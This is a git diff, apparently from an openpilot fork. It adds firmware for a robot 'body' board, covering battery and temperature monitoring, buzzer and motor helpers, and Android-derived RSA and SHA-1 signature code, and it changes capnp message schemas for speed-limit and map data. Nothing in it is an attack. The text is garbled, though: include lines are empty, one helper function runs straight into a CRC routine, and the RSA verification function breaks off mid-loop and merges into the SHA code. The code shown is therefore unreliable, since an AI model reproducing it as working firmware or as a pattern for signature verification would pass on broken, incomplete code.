board_temp_adcFilt = (int16_t)(board_temp_adcFixdt >> 16); // convert fixed-point to integer + board_temp_deg_c = (TEMP_CAL_HIGH_DEG_C - TEMP_CAL_LOW_DEG_C) * (board_temp_adcFilt - TEMP_CAL_LOW_ADC) / (TEMP_CAL_HIGH_ADC - TEMP_CAL_LOW_ADC) + TEMP_CAL_LOW_DEG_C; + + // ####### CALC CALIBRATED BATTERY VOLTAGE ####### + batVoltageCalib = batVoltage * BAT_CALIB_REAL_VOLTAGE / BAT_CALIB_ADC; + + charger_connected = !HAL_GPIO_ReadPin(CHARGER_PORT, CHARGER_PIN); + uint8_t battery_percent = 100 - (((420 * BAT_CELLS) - batVoltageCalib) / BAT_CELLS / VOLTS_PER_PERCENT / 100); // Battery % left + + // BODY_DATA: MCU temp(2), battery voltage(2), battery_percent(0:7), charger_connected(0:1) + uint8_t dat[4]; + dat[0] = board_temp_deg_c & 0xFFU; + dat[1] = (batVoltageCalib >> 8U) & 0xFFU; + dat[2] = batVoltageCalib & 0xFFU; + dat[3] = (((battery_percent & 0x7FU) << 1U) | charger_connected); + can_send_msg((0x203U + board.can_addr_offset), 0x0U, ((dat[3] << 24U) | (dat[2] << 16U) | (dat[1] << 8U) | dat[0]), 4U); + + out_enable(LED_BLUE, false); // Reset LED after CAN RX + out_enable(LED_GREEN, true); // Always use LED to show that body is on + + if ((hw_type == HW_TYPE_BASE) && ignition) { + ignition_off_counter = 0; + } else { + ignition_off_counter = (ignition_off_counter < MAX_uint32_T) ? (ignition_off_counter+1) : 0; + } + + if ((TEMP_POWEROFF_ENABLE && board_temp_deg_c >= TEMP_POWEROFF && speedAvgAbs < 20) || (batVoltage < BAT_DEAD && speedAvgAbs < 20)) { // poweroff before mainboard burns OR low bat 3 + poweroff(); + } else if (rtY_Left.z_errCode || rtY_Right.z_errCode) { // 1 beep (low pitch): Motor error, disable motors + enable_motors = 0; + beepCount(1, 24, 1); + } else if (fault_status.left_angle || fault_status.left_i2c || fault_status.right_angle || fault_status.right_i2c) { // 2 beeps (low pitch): Motor error, disable motors + beepCount(2, 24, 1); + } else if (TEMP_WARNING_ENABLE && board_temp_deg_c >= TEMP_WARNING) { // 5 beeps (low pitch): Mainboard temperature warning + beepCount(5, 24, 1); + } else if (batVoltage < BAT_LVL1) { // 1 beep fast (medium pitch): Low bat 1 + beepCount(0, 10, 6); + out_enable(LED_RED, true); + } else if (batVoltage < BAT_LVL2) { // 1 beep slow (medium pitch): Low bat 2 + beepCount(0, 10, 30); + } else { // do not beep + beepCount(0, 0, 0); + out_enable(LED_RED, false); + } + + main_loop_1Hz_runtime = HAL_GetTick() - main_loop_1Hz_runtime; + main_loop_1Hz = HAL_GetTick(); + } + + if (hw_type == HW_TYPE_BASE) { + if (HAL_GPIO_ReadPin(BUTTON_PORT, BUTTON_PIN)) { + cnt_press += 1; + if (cnt_press == (2 * 1008)) { + poweroff(); + } + } else if (cnt_press >= 10) { + ignition = !ignition; + out_enable(IGNITION, ignition); + beepShort(5); + cnt_press = 0; + } + } + + process_can(); + tick_prev = HAL_GetTick(); + } + } +} diff --git a/body/board/obj/body.bin b/body/board/obj/body.bin index 950912a47..dc2e2f95d 100755 Binary files a/body/board/obj/body.bin and b/body/board/obj/body.bin differ diff --git a/body/board/obj/body.bin.signed b/body/board/obj/body.bin.signed index 42c562a76..5047a96e6 100644 Binary files a/body/board/obj/body.bin.signed and b/body/board/obj/body.bin.signed differ diff --git a/body/board/obj/body.elf b/body/board/obj/body.elf index a003ab13f..60e34ecf0 100755 Binary files a/body/board/obj/body.elf and b/body/board/obj/body.elf differ diff --git a/body/board/obj/bootstub.body.bin b/body/board/obj/bootstub.body.bin index 41365e404..37c127f2e 100755 Binary files a/body/board/obj/bootstub.body.bin and b/body/board/obj/bootstub.body.bin differ diff --git a/body/board/obj/bootstub.body.elf b/body/board/obj/bootstub.body.elf index ea5bb6aed..76c001e5d 100755 Binary files a/body/board/obj/bootstub.body.elf and b/body/board/obj/bootstub.body.elf differ diff --git a/body/board/obj/gitversion.h b/body/board/obj/gitversion.h index 7cbe7e6b5..0e508e941 100644 --- a/body/board/obj/gitversion.h +++ b/body/board/obj/gitversion.h @@ -1 +1 @@ -const uint8_t gitversion[8] = "e112738d"; +const uint8_t gitversion[8] = "58ea5b9c"; diff --git a/body/board/util.c b/body/board/util.c new file mode 100644 index 000000000..c0b19ff19 --- /dev/null +++ b/body/board/util.c @@ -0,0 +1,258 @@ +#include +#include "stm32f4xx_hal.h" +#include "defines.h" +#include "config.h" +#include "util.h" +#include "bldc/BLDC_controller.h" +#include "bldc/rtwtypes.h" + +// TODO: simplify util.c to util.h + +//------------------------------------------------------------------------ +// Global variables set externally +//------------------------------------------------------------------------ +extern int16_t batVoltage; +extern uint8_t buzzerCount; // global variable for the buzzer counts. can be 1, 2, 3, 4, 5, 6, 7... +extern uint8_t buzzerFreq; // global variable for the buzzer pitch. can be 1, 2, 3, 4, 5, 6, 7... +extern uint8_t buzzerPattern; // global variable for the buzzer pattern. can be 1, 2, 3, 4, 5, 6, 7... + +extern uint8_t enable_motors; // global variable for motor enable +extern uint8_t ignition; // global variable for ignition on SBU2 line + +extern uint8_t hw_type; + +extern board_t board; + +//------------------------------------------------------------------------ +// Matlab defines - from auto-code generation +//--------------- +RT_MODEL rtM_Left_; /* Real-time model */ +RT_MODEL rtM_Right_; /* Real-time model */ +RT_MODEL *const rtM_Left = &rtM_Left_; +RT_MODEL *const rtM_Right = &rtM_Right_; + +extern P rtP_Left; /* Block parameters (auto storage) */ +DW rtDW_Left; /* Observable states */ +ExtU rtU_Left; /* External inputs */ +ExtY rtY_Left; /* External outputs */ + +P rtP_Right; /* Block parameters (auto storage) */ +DW rtDW_Right; /* Observable states */ +ExtU rtU_Right; /* External inputs */ +ExtY rtY_Right; /* External outputs */ +//--------------- + +int16_t speedAvg; // average measured speed +int16_t speedAvgAbs; // average measured speed in absolute + +uint8_t ctrlModReqRaw = CTRL_MOD_REQ; +uint8_t ctrlModReq = CTRL_MOD_REQ; // Final control mode request + + +void BLDC_Init(void) { + /* Set BLDC controller parameters */ + rtP_Left.b_angleMeasEna = 0; // Motor angle input: 0 = estimated angle, 1 = measured angle (e.g. if encoder is available) + rtP_Left.z_selPhaCurMeasABC = 0; // Left motor measured current phases {Green, Blue} = {iA, iB} -> do NOT change + rtP_Left.z_ctrlTypSel = CTRL_TYP_SEL; + rtP_Left.b_diagEna = DIAG_ENA; + rtP_Left.i_max = (I_MOT_MAX * A2BIT_CONV) << 4; // fixdt(1,16,4) + rtP_Left.n_max = N_MOT_MAX << 4; // fixdt(1,16,4) + rtP_Left.b_fieldWeakEna = FIELD_WEAK_ENA; + rtP_Left.id_fieldWeakMax = (FIELD_WEAK_MAX * A2BIT_CONV) << 4; // fixdt(1,16,4) + rtP_Left.a_phaAdvMax = PHASE_ADV_MAX << 4; // fixdt(1,16,4) + rtP_Left.r_fieldWeakHi = FIELD_WEAK_HI << 4; // fixdt(1,16,4) + rtP_Left.r_fieldWeakLo = FIELD_WEAK_LO << 4; // fixdt(1,16,4) + + rtP_Right = rtP_Left; // Copy the Left motor parameters to the Right motor parameters + rtP_Right.n_max = N_MOT_MAX << 4; // But add separate max RPM limit + rtP_Right.z_selPhaCurMeasABC = 1; // Right motor measured current phases {Blue, Yellow} = {iB, iC} -> do NOT change + + /* Pack LEFT motor data into RTM */ + rtM_Left->defaultParam = &rtP_Left; + rtM_Left->dwork = &rtDW_Left; + rtM_Left->inputs = &rtU_Left; + rtM_Left->outputs = &rtY_Left; + + /* Pack RIGHT motor data into RTM */ + rtM_Right->defaultParam = &rtP_Right; + rtM_Right->dwork = &rtDW_Right; + rtM_Right->inputs = &rtU_Right; + rtM_Right->outputs = &rtY_Right; + + /* Initialize BLDC controllers */ + BLDC_controller_initialize(rtM_Left); + BLDC_controller_initialize(rtM_Right); +} + +void out_enable(uint8_t out, bool enabled) { + switch(out) { + case LED_GREEN: + HAL_GPIO_WritePin(board.led_portG, board.led_pinG, !enabled); + break; + case LED_RED: + HAL_GPIO_WritePin(board.led_portR, board.led_pinR, !enabled); + break; + case LED_BLUE: + HAL_GPIO_WritePin(board.led_portB, board.led_pinB, !enabled); + break; + case IGNITION: + HAL_GPIO_WritePin(board.ignition_port, board.ignition_pin, enabled); + break; + case POWERSWITCH: + HAL_GPIO_WritePin(OFF_PORT, OFF_PIN, enabled); + break; + case TRANSCEIVER: + HAL_GPIO_WritePin(board.can_portEN, board.can_pinEN, !enabled); + break; + } +} + +void poweronMelody(void) { + buzzerCount = 0; + for (int i = 8; i >= 0; i--) { + buzzerFreq = (uint8_t)i; + HAL_Delay(100); + } + buzzerFreq = 0; +} + +void beepCount(uint8_t cnt, uint8_t freq, uint8_t pattern) { + buzzerCount = cnt; + buzzerFreq = freq; + buzzerPattern = pattern; +} + +void beepLong(uint8_t freq) { + buzzerCount = 0; + buzzerFreq = freq; + HAL_Delay(500); + buzzerFreq = 0; +} + +void beepShort(uint8_t freq) { + buzzerCount = 0; + buzzerFreq = freq; + HAL_Delay(100); + buzzerFreq = 0; +} + +void beepShortMany(uint8_t cnt, int8_t dir) { + if (dir >= 0) { // increasing tone + for(uint8_t i = 2*cnt; i >= 2; i=i-2) { + beepShort(i + 3); + } + } else { // decreasing tone + for(uint8_t i = 2; i <= 2*cnt; i=i+2) { + beepShort(i + 3); + } + } +} + +void calcAvgSpeed(void) { + // Calculate measured average speed. The minus sign (-) is because motors spin in opposite directions + speedAvg = ( rtY_Left.n_mot - rtY_Right.n_mot) / 2; + + // Handle the case when SPEED_COEFFICIENT sign is negative (which is when most significant bit is 1) + if (SPEED_COEFFICIENT & (1 << 16)) { + speedAvg = -speedAvg; + } + speedAvgAbs = ABS(speedAvg); +} + +void poweroff(void) { + enable_motors = 0; + buzzerCount = 0; + buzzerPattern = 0; + for (int i = 0; i < 8; i++) { + buzzerFreq = (uint8_t)i; + HAL_Delay(100); + } + out_enable(POWERSWITCH, false); + while(1) { + // Temporarily, to see that we went to power off but can't switch the latch + HAL_GPIO_TogglePin(board.led_portR, board.led_pinR); + HAL_Delay(100); + } +} + +#define PULL_EFFECTIVE_DELAY 4096 +uint8_t detect_with_pull(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin, uint32_t mode) { + GPIO_InitTypeDef GPIO_InitStruct; + GPIO_InitStruct.Pin = GPIO_Pin; + GPIO_InitStruct.Mode = GPIO_MODE_INPUT; + GPIO_InitStruct.Pull = mode; + HAL_GPIO_Init(GPIOx, &GPIO_InitStruct); + for (volatile int i=0; i= 0; i--) { + crc ^= dat[i]; + for (j = 0; j < 8; j++) { + if ((crc & 0x80U) != 0U) { + crc = (uint8_t)((crc << 1) ^ poly); + } + else { + crc <<= 1; + } + } + } + return crc; +} + +/* =========================== Filtering Functions =========================== */ + + /* Low pass filter fixed-point 32 bits: fixdt(1,32,16) + * Max: 32767.99998474121 + * Min: -32768 + * Res: 1.52587890625e-05 + * + * Inputs: u = int16 or int32 + * Outputs: y = fixdt(1,32,16) + * Parameters: coef = fixdt(0,16,16) = [0,65535U] + * + * Example: + * If coef = 0.8 (in floating point), then coef = 0.8 * 2^16 = 52429 (in fixed-point) + * filtLowPass16(u, 52429, &y); + * yint = (int16_t)(y >> 16); // the integer output is the fixed-point ouput shifted by 16 bits + */ +void filtLowPass32(int32_t u, uint16_t coef, int32_t *y) { + int64_t tmp; + tmp = ((int64_t)((u << 4) - (*y >> 12)) * coef) >> 4; + tmp = CLAMP(tmp, -2147483648LL, 2147483647LL); // Overflow protection: 2147483647LL = 2^31 - 1 + *y = (int32_t)tmp + (*y); +} + + /* rateLimiter16(int16_t u, int16_t rate, int16_t *y); + * Inputs: u = int16 + * Outputs: y = fixdt(1,16,4) + * Parameters: rate = fixdt(1,16,4) = [0, 32767] Do NOT make rate negative (>32767) + */ +void rateLimiter16(int16_t u, int16_t rate, int16_t *y) { + int16_t q0; + int16_t q1; + + q0 = (u << 4) - *y; + + if (q0 > rate) { + q0 = rate; + } else { + q1 = -rate; + if (q0 < q1) { + q0 = q1; + } + } + + *y = q0 + *y; +} diff --git a/body/crypto/rsa.c b/body/crypto/rsa.c new file mode 100644 index 000000000..24171e879 --- /dev/null +++ b/body/crypto/rsa.c @@ -0,0 +1,294 @@ +/* rsa.c +** +** Copyright 2012, The Android Open Source Project +** +** Redistribution and use in source and binary forms, with or without +** modification, are permitted provided that the following conditions are met: +** * Redistributions of source code must retain the above copyright +** notice, this list of conditions and the following disclaimer. +** * Redistributions in binary form must reproduce the above copyright +** notice, this list of conditions and the following disclaimer in the +** documentation and/or other materials provided with the distribution. +** * Neither the name of Google Inc. nor the names of its contributors may +** be used to endorse or promote products derived from this software +** without specific prior written permission. +** +** THIS SOFTWARE IS PROVIDED BY Google Inc. ``AS IS'' AND ANY EXPRESS OR +** IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +** MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO +** EVENT SHALL Google Inc. BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, +** PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; +** OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, +** WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +** OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF +** ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ + +#include "rsa.h" +#include "sha.h" + +// a[] -= mod +static void subM(const RSAPublicKey* key, + uint32_t* a) { + int64_t A = 0; + int i; + for (i = 0; i < key->len; ++i) { + A += (uint64_t)a[i] - key->n[i]; + a[i] = (uint32_t)A; + A >>= 32; + } +} + +// return a[] >= mod +static int geM(const RSAPublicKey* key, + const uint32_t* a) { + int i; + for (i = key->len; i;) { + --i; + if (a[i] < key->n[i]) return 0; + if (a[i] > key->n[i]) return 1; + } + return 1; // equal +} + +// montgomery c[] += a * b[] / R % mod +static void montMulAdd(const RSAPublicKey* key, + uint32_t* c, + const uint32_t a, + const uint32_t* b) { + uint64_t A = (uint64_t)a * b[0] + c[0]; + uint32_t d0 = (uint32_t)A * key->n0inv; + uint64_t B = (uint64_t)d0 * key->n[0] + (uint32_t)A; + int i; + + for (i = 1; i < key->len; ++i) { + A = (A >> 32) + (uint64_t)a * b[i] + c[i]; + B = (B >> 32) + (uint64_t)d0 * key->n[i] + (uint32_t)A; + c[i - 1] = (uint32_t)B; + } + + A = (A >> 32) + (B >> 32); + + c[i - 1] = (uint32_t)A; + + if (A >> 32) { + subM(key, c); + } +} + +// montgomery c[] = a[] * b[] / R % mod +static void montMul(const RSAPublicKey* key, + uint32_t* c, + const uint32_t* a, + const uint32_t* b) { + int i; + for (i = 0; i < key->len; ++i) { + c[i] = 0; + } + for (i = 0; i < key->len; ++i) { + montMulAdd(key, c, a[i], b); + } +} + +// In-place public exponentiation. +// Input and output big-endian byte array in inout. +static void modpow(const RSAPublicKey* key, + uint8_t* inout) { + uint32_t a[RSANUMWORDS]; + uint32_t aR[RSANUMWORDS]; + uint32_t aaR[RSANUMWORDS]; + uint32_t* aaa = 0; + int i; + + // Convert from big endian byte array to little endian word array. + for (i = 0; i < key->len; ++i) { + uint32_t tmp = + (inout[((key->len - 1 - i) * 4) + 0] << 24) | + (inout[((key->len - 1 - i) * 4) + 1] << 16) | + (inout[((key->len - 1 - i) * 4) + 2] << 8) | + (inout[((key->len - 1 - i) * 4) + 3] << 0); + a[i] = tmp; + } + + if (key->exponent == 65537) { + aaa = aaR; // Re-use location. + montMul(key, aR, a, key->rr); // aR = a * RR / R mod M + for (i = 0; i < 16; i += 2) { + montMul(key, aaR, aR, aR); // aaR = aR * aR / R mod M + montMul(key, aR, aaR, aaR); // aR = aaR * aaR / R mod M + } + montMul(key, aaa, aR, a); // aaa = aR * a / R mod M + } else if (key->exponent == 3) { + aaa = aR; // Re-use location. + montMul(key, aR, a, key->rr); /* aR = a * RR / R mod M */ + montMul(key, aaR, aR, aR); /* aaR = aR * aR / R mod M */ + montMul(key, aaa, aaR, a); /* aaa = aaR * a / R mod M */ + } + + // Make sure aaa < mod; aaa is at most 1x mod too large. + if (geM(key, aaa)) { + subM(key, aaa); + } + + // Convert to bigendian byte array + for (i = key->len - 1; i >= 0; --i) { + uint32_t tmp = aaa[i]; + *inout++ = tmp >> 24; + *inout++ = tmp >> 16; + *inout++ = tmp >> 8; + *inout++ = tmp >> 0; + } +} + +// Expected PKCS1.5 signature padding bytes, for a keytool RSA signature. +// Has the 0-length optional parameter encoded in the ASN1 (as opposed to the +// other flavor which omits the optional parameter entirely). This code does not +// accept signatures without the optional parameter. + +/* +static const uint8_t sha_padding[RSANUMBYTES] = { + 0x00, 0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0x00, 0x30, 0x21, 0x30, + 0x09, 0x06, 0x05, 0x2b, 0x0e, 0x03, 0x02, 0x1a, + 0x05, 0x00, 0x04, 0x14, + + // 20 bytes of hash go here. + 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 +}; +*/ + +static const uint8_t sha_padding_1024[RSANUMBYTES] = { + 0x00, 0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0xff, 0x00, + + // 20 bytes of hash go here. + 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 +}; + +// SHA-1 of PKCS1.5 signature sha_padding for 2048 bit, as above. +// At the location of the bytes of the hash all 00 are hashed. +/*static const uint8_t kExpectedPadShaRsa2048[SHA_DIGEST_SIZE] = { + 0xdc, 0xbd, 0xbe, 0x42, 0xd5, 0xf5, 0xa7, 0x2e, + 0x6e, 0xfc, 0xf5, 0x5d, 0xaf, 0x9d, 0xea, 0x68, + 0x7c, 0xfb, 0xf1, 0x67 +};*/ + +// Verify a 2048-bit RSA PKCS1.5 signature against an expected hash. +// Both e=3 and e=65537 are supported. hash_len may be +// SHA_DIGEST_SIZE (== 20) to indicate a SHA-1 hash, or +// SHA256_DIGEST_SIZE (== 32) to indicate a SHA-256 hash. No other +// values are supported. +// +// Returns 1 on successful verification, 0 on failure. +int RSA_verify(const RSAPublicKey *key, + const uint8_t *signature, + const int len, + const uint8_t *hash, + const int hash_len) { + uint8_t buf[RSANUMBYTES]; + int i; + //const uint8_t* padding_hash; + + if (key->len != RSANUMWORDS) { + return 0; // Wrong key passed in. + } + + if (len != sizeof(buf)) { + return 0; // Wrong input length. + } + + if (hash_len != SHA_DIGEST_SIZE) { + return 0; // Unsupported hash. + } + + if (key->exponent != 3 && key->exponent != 65537) { + return 0; // Unsupported exponent. + } + + for (i = 0; i < len; ++i) { // Copy input to local workspace. + buf[i] = signature[i]; + } + + modpow(key, buf); // In-place exponentiation. + +#ifdef TEST_RSA + printf("sig\n"); + for (i=0;i> (32 - (bits)))) + +static void SHA1_Transform(SHA_CTX* ctx) { + uint32_t W[80]; + uint32_t A, B, C, D, E; + uint8_t* p = ctx->buf; + int t; + + for(t = 0; t < 16; ++t) { + uint32_t tmp = *p++ << 24; + tmp |= *p++ << 16; + tmp |= *p++ << 8; + tmp |= *p++; + W[t] = tmp; + } + + for(; t < 80; t++) { + W[t] = rol(1,W[t-3] ^ W[t-8] ^ W[t-14] ^ W[t-16]); + } + + A = ctx->state[0]; + B = ctx->state[1]; + C = ctx->state[2]; + D = ctx->state[3]; + E = ctx->state[4]; + + for(t = 0; t < 80; t++) { + uint32_t tmp = rol(5,A) + E + W[t]; + + if (t < 20) + tmp += (D^(B&(C^D))) + 0x5A827999; + else if ( t < 40) + tmp += (B^C^D) + 0x6ED9EBA1; + else if ( t < 60) + tmp += ((B&C)|(D&(B|C))) + 0x8F1BBCDC; + else + tmp += (B^C^D) + 0xCA62C1D6; + + E = D; + D = C; + C = rol(30,B); + B = A; + A = tmp; + } + + ctx->state[0] += A; + ctx->state[1] += B; + ctx->state[2] += C; + ctx->state[3] += D; + ctx->state[4] += E; +} + +static const HASH_VTAB SHA_VTAB = { + SHA_init, + SHA_update, + SHA_final, + SHA_hash, + SHA_DIGEST_SIZE +}; + +void SHA_init(SHA_CTX* ctx) { + ctx->f = &SHA_VTAB; + ctx->state[0] = 0x67452301; + ctx->state[1] = 0xEFCDAB89; + ctx->state[2] = 0x98BADCFE; + ctx->state[3] = 0x10325476; + ctx->state[4] = 0xC3D2E1F0; + ctx->count = 0; +} + + +void SHA_update(SHA_CTX* ctx, const void* data, int len) { + int i = (int) (ctx->count & 63); + const uint8_t* p = (const uint8_t*)data; + + ctx->count += len; + + while (len--) { + ctx->buf[i++] = *p++; + if (i == 64) { + SHA1_Transform(ctx); + i = 0; + } + } +} + + +const uint8_t* SHA_final(SHA_CTX* ctx) { + uint8_t *p = ctx->buf; + uint64_t cnt = ctx->count * 8; + int i; + + SHA_update(ctx, (uint8_t*)"\x80", 1); + while ((ctx->count & 63) != 56) { + SHA_update(ctx, (uint8_t*)"\0", 1); + } + + /* Hack - right shift operator with non const argument requires + * libgcc.a which is missing in EON + * thus expanding for loop from + + for (i = 0; i < 8; ++i) { + uint8_t tmp = (uint8_t) (cnt >> ((7 - i) * 8)); + SHA_update(ctx, &tmp, 1); + } + + to + */ + + uint8_t tmp = 0; + tmp = (uint8_t) (cnt >> ((7 - 0) * 8)); + SHA_update(ctx, &tmp, 1); + tmp = (uint8_t) (cnt >> ((7 - 1) * 8)); + SHA_update(ctx, &tmp, 1); + tmp = (uint8_t) (cnt >> ((7 - 2) * 8)); + SHA_update(ctx, &tmp, 1); + tmp = (uint8_t) (cnt >> ((7 - 3) * 8)); + SHA_update(ctx, &tmp, 1); + tmp = (uint8_t) (cnt >> ((7 - 4) * 8)); + SHA_update(ctx, &tmp, 1); + tmp = (uint8_t) (cnt >> ((7 - 5) * 8)); + SHA_update(ctx, &tmp, 1); + tmp = (uint8_t) (cnt >> ((7 - 6) * 8)); + SHA_update(ctx, &tmp, 1); + tmp = (uint8_t) (cnt >> ((7 - 7) * 8)); + SHA_update(ctx, &tmp, 1); + + for (i = 0; i < 5; i++) { + uint32_t tmp = ctx->state[i]; + *p++ = tmp >> 24; + *p++ = tmp >> 16; + *p++ = tmp >> 8; + *p++ = tmp >> 0; + } + + return ctx->buf; +} + +/* Convenience function */ +const uint8_t* SHA_hash(const void* data, int len, uint8_t* digest) { + SHA_CTX ctx; + SHA_init(&ctx); + SHA_update(&ctx, data, len); + memcpy(digest, SHA_final(&ctx), SHA_DIGEST_SIZE); + return digest; +} diff --git a/cereal/car.capnp b/cereal/car.capnp index 2fe4eabc0..25f396ec9 100644 --- a/cereal/car.capnp +++ b/cereal/car.capnp @@ -116,13 +116,6 @@ struct CarEvent @0x9b1657f34caf3ad3 { steerTimeLimit @115; vehicleSensorsInvalid @116; - #dp - speedLimitActive @118; - speedLimitValueChange @119; - leadMovingAlertSilent @120; - leadMovingAlert @121; - manualSteeringRequiredBlinkersOn @122; - radarCanErrorDEPRECATED @15; communityFeatureDisallowedDEPRECATED @62; radarCommIssueDEPRECATED @67; @@ -224,14 +217,6 @@ struct CarState { fuelGauge @41 :Float32; # battery or fuel tank level from 0.0 to 1.0 charging @43 :Bool; - # dp - distanceLines @48 :UInt8; - rightBlindspotD1 @49 :Float32; - rightBlindspotD2 @50 :Float32; - leftBlindspotD1 @51 :Float32; - leftBlindspotD2 @52 :Float32; - blindspotside @53 :Float32; - struct WheelSpeeds { # optional wheel speeds fl @0 :Float32; @@ -248,7 +233,6 @@ struct CarState { speedOffset @3 :Float32; standstill @4 :Bool; nonAdaptive @5 :Bool; - speedLimit @7 :Float32; } enum GearShifter { @@ -351,8 +335,6 @@ struct CarControl { cruiseControl @4 :CruiseControl; hudControl @5 :HUDControl; - latController @17 :Text; - struct Actuators { # range from 0.0 - 1.0 gas @0: Float32; @@ -449,15 +431,6 @@ struct CarParams { enableBsm @56 :Bool; # blind spot monitoring flags @64 :UInt32; # flags for car specific quirks experimentalLongitudinalAvailable @71 :Bool; - #dp: enable torque interceptor - enableTorqueInterceptor @72 :Bool; - #dp: alt tune collection - latTuneCollection @73 :LatTunes; - struct LatTunes { - pid @0 :LateralPIDTuning; - lqr @1 :LateralLQRTuning; - torque @2 :LateralTorqueTuning; - } minEnableSpeed @7 :Float32; minSteerSpeed @8 :Float32; diff --git a/cereal/custom.capnp b/cereal/custom.capnp index 369222add..31d55afe5 100644 --- a/cereal/custom.capnp +++ b/cereal/custom.capnp @@ -8,13 +8,77 @@ $Cxx.namespace("cereal"); # cereal, so use these if you want custom events in your fork. # you can rename the struct, but don't change the identifier -struct CustomReserved0 @0x81c2f05a394cf4af { +struct LiveMapData @0x81c2f05a394cf4af { + speedLimitValid @0 :Bool; + speedLimit @1 :Float32; + speedLimitAheadValid @2 :Bool; + speedLimitAhead @3 :Float32; + speedLimitAheadDistance @4 :Float32; + turnSpeedLimitValid @5 :Bool; + turnSpeedLimit @6 :Float32; + turnSpeedLimitEndDistance @7 :Float32; + turnSpeedLimitSign @8 :Int16; + turnSpeedLimitsAhead @9 :List(Float32); + turnSpeedLimitsAheadDistances @10 :List(Float32); + turnSpeedLimitsAheadSigns @11 :List(Int16); + lastGpsTimestamp @12 :Int64; # Milliseconds since January 1, 1970. + currentRoadName @13 :Text; + lastGpsLatitude @14 :Float64; + lastGpsLongitude @15 :Float64; + lastGpsSpeed @16 :Float32; + lastGpsBearingDeg @17 :Float32; + lastGpsAccuracy @18 :Float32; + lastGpsBearingAccuracyDeg @19 :Float32; } -struct CustomReserved1 @0xaedffd8f31e7b55d { +struct LongitudinalPlanExt @0xaedffd8f31e7b55d { + visionTurnControllerState @0 :VisionTurnControllerState; + visionTurnSpeed @1 :Float32; + speedLimitControlState @2 :SpeedLimitControlState; + speedLimit @3 :Float32; + speedLimitOffset @4 :Float32; + distToSpeedLimit @5 :Float32; + isMapSpeedLimit @6 :Bool; + speedLimitPercOffset @7 :Bool; + speedLimitValueOffset @8 :Float32; + + distToTurn @9 :Float32; + turnSpeed @10 :Float32; + turnSpeedControlState @11 :SpeedLimitControlState; + turnSign @12 :Int16; + + dpE2EIsBlended @13 :Bool; + longitudinalPlanExtSource @14 :LongitudinalPlanExtSource; + + enum LongitudinalPlanExtSource { + cruise @0; + lead0 @1; + lead1 @2; + lead2 @3; + e2e @4; 